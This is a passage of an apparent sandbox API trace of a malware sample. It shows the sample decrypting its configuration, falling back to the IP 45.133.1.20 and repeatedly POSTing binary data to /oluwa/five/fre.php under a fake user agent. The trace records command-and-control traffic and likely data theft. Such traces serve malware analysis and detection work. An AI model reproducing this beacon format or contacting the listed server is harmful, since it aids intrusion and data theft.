(in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0210.371] GetProcessHeap () returned 0x6a0000 [0210.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0210.371] socket (af=2, type=1, protocol=6) returned 0x5bc [0210.371] connect (s=0x5bc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0210.400] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0210.400] GetProcessHeap () returned 0x6a0000 [0210.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0210.400] GetProcessHeap () returned 0x6a0000 [0210.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c6720 [0210.401] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0210.402] wvsprintfA (in: param_1=0x6c6720, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0210.402] GetProcessHeap () returned 0x6a0000 [0210.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0210.402] GetProcessHeap () returned 0x6a0000 [0210.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0210.403] GetProcessHeap () returned 0x6a0000 [0210.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0210.403] GetProcessHeap () returned 0x6a0000 [0210.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c6720 [0210.404] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0210.405] wvsprintfA (in: param_1=0x6c6720, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0210.405] GetProcessHeap () returned 0x6a0000 [0210.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0210.405] GetProcessHeap () returned 0x6a0000 [0210.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0210.405] send (s=0x5bc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0210.406] send (s=0x5bc, buf=0x6bb998*, len=159, flags=0) returned 159 [0210.406] GetProcessHeap () returned 0x6a0000 [0210.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0210.406] recv (in: s=0x5bc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0210.482] GetProcessHeap () returned 0x6a0000 [0210.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0210.483] GetProcessHeap () returned 0x6a0000 [0210.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0210.483] GetProcessHeap () returned 0x6a0000 [0210.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0210.486] GetProcessHeap () returned 0x6a0000 [0210.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0210.486] closesocket (s=0x5bc) returned 0 [0210.487] GetProcessHeap () returned 0x6a0000 [0210.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0210.487] GetProcessHeap () returned 0x6a0000 [0210.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0210.487] GetProcessHeap () returned 0x6a0000 [0210.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0210.488] GetProcessHeap () returned 0x6a0000 [0210.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0210.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf70) returned 0x5bc [0210.490] Sleep (dwMilliseconds=0xea60) [0210.492] GetProcessHeap () returned 0x6a0000 [0210.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0210.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.494] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.502] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0210.515] GetProcessHeap () returned 0x6a0000 [0210.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0210.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.517] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0210.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.524] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.525] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.525] GetProcessHeap () returned 0x6a0000 [0210.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0210.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.530] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0210.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.531] CryptDestroyKey (hKey=0x6ad020) returned 1 [0210.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.532] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0210.532] GetProcessHeap () returned 0x6a0000 [0210.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0210.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.533] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.534] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.536] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.537] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.537] GetProcessHeap () returned 0x6a0000 [0210.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0210.537] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.538] GetProcessHeap () returned 0x6a0000 [0210.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0210.538] GetProcessHeap () returned 0x6a0000 [0210.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0210.541] GetProcessHeap () returned 0x6a0000 [0210.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0210.541] GetProcessHeap () returned 0x6a0000 [0210.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0210.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.549] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0210.557] GetProcessHeap () returned 0x6a0000 [0210.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0210.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.559] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0210.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.560] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.564] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.564] GetProcessHeap () returned 0x6a0000 [0210.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0210.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.566] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0210.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.567] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0210.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.571] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0210.571] GetProcessHeap () returned 0x6a0000 [0210.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0210.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.575] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0210.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.576] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0210.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.577] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0210.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.579] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0210.579] GetProcessHeap () returned 0x6a0000 [0210.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0210.579] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0210.579] GetProcessHeap () returned 0x6a0000 [0210.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0210.579] socket (af=2, type=1, protocol=6) returned 0x5c0 [0210.579] connect (s=0x5c0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0210.604] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0210.604] GetProcessHeap () returned 0x6a0000 [0210.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0210.604] GetProcessHeap () returned 0x6a0000 [0210.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0210.606] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0210.607] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0210.607] GetProcessHeap () returned 0x6a0000 [0210.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0210.607] GetProcessHeap () returned 0x6a0000 [0210.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0210.608] GetProcessHeap () returned 0x6a0000 [0210.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0210.608] GetProcessHeap () returned 0x6a0000 [0210.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0210.609] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0210.610] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0210.610] GetProcessHeap () returned 0x6a0000 [0210.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0210.610] GetProcessHeap () returned 0x6a0000 [0210.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0210.610] send (s=0x5c0, buf=0x6bd460*, len=242, flags=0) returned 242 [0210.611] send (s=0x5c0, buf=0x6bb998*, len=159, flags=0) returned 159 [0210.611] GetProcessHeap () returned 0x6a0000 [0210.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0210.611] recv (in: s=0x5c0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0210.688] GetProcessHeap () returned 0x6a0000 [0210.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0210.691] GetProcessHeap () returned 0x6a0000 [0210.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0210.692] GetProcessHeap () returned 0x6a0000 [0210.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0210.695] GetProcessHeap () returned 0x6a0000 [0210.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0210.695] closesocket (s=0x5c0) returned 0 [0210.696] GetProcessHeap () returned 0x6a0000 [0210.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0210.697] GetProcessHeap () returned 0x6a0000 [0210.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0210.698] GetProcessHeap () returned 0x6a0000 [0210.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0210.699] GetProcessHeap () returned 0x6a0000 [0210.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0210.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf68) returned 0x5c0 [0210.701] Sleep (dwMilliseconds=0xea60) [0210.703] GetProcessHeap () returned 0x6a0000 [0210.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0210.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0210.725] GetProcessHeap () returned 0x6a0000 [0210.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0210.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.728] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0210.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.735] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.740] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.740] GetProcessHeap () returned 0x6a0000 [0210.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0210.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.742] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0210.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.744] CryptDestroyKey (hKey=0x6ad020) returned 1 [0210.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.759] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0210.759] GetProcessHeap () returned 0x6a0000 [0210.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0210.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.760] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.762] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.763] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.767] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.767] GetProcessHeap () returned 0x6a0000 [0210.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0210.784] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.784] GetProcessHeap () returned 0x6a0000 [0210.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0210.785] GetProcessHeap () returned 0x6a0000 [0210.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0210.785] GetProcessHeap () returned 0x6a0000 [0210.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0210.786] GetProcessHeap () returned 0x6a0000 [0210.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0210.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.787] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.797] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0210.806] GetProcessHeap () returned 0x6a0000 [0210.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0210.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.808] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0210.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.809] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.810] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.810] GetProcessHeap () returned 0x6a0000 [0210.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0210.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.812] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0210.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.816] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0210.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.818] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0210.818] GetProcessHeap () returned 0x6a0000 [0210.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0210.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0210.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.820] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0210.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.822] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0210.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.823] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0210.823] GetProcessHeap () returned 0x6a0000 [0210.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0210.823] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0210.823] GetProcessHeap () returned 0x6a0000 [0210.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0210.823] socket (af=2, type=1, protocol=6) returned 0x5c4 [0210.824] connect (s=0x5c4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0210.923] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, 